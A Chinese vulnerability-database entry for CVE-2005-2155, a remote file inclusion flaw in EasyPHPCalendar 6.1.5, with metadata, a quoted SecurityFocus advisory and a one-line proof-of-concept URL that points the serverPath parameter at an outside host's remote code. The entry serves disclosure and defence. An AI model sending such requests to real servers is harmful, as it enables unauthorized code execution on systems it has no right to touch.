EasyPHPCalendar serverPath 远程文件包含漏洞

EasyPHPCalendar serverPath 远程文件包含漏洞

漏洞ID 1108909 漏洞类型 未知
发布时间 2005-07-04 更新时间 2005-07-06
图片[1]-EasyPHPCalendar serverPath 远程文件包含漏洞-安全小百科CVE编号 CVE-2005-2155
图片[2]-EasyPHPCalendar serverPath 远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200507-058
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/25932
https://www.securityfocus.com/bid/88950
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-058
|漏洞详情
EasyPHPCalendar是一款Web日历工具。EasyPHPCalendar6.1.5及之前版本中存在PHP远程文件包含漏洞。远程攻击者可通过serverPath参数,执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14131/info
    
EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
    
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
    
These issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable. 

http://www.example.com/calendar/setup/setupSQL.php?serverPath=http://www.example.com/[remote code]
|受影响的产品
EasyPHPCalendar EasyPHPCalendar 6.1.5
|参考资料

来源:SECUNIA
名称:15893
链接:http://secunia.com/advisories/15893

相关推荐: Guestbook 4.0 – Sensitive Information Disclosure

Guestbook 4.0 – Sensitive Information Disclosure 漏洞ID 1053820 漏洞类型 发布时间 2003-04-10 更新时间 2003-04-10 CVE编号 N/A CNNVD-ID N/A 漏洞平台 CGI…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享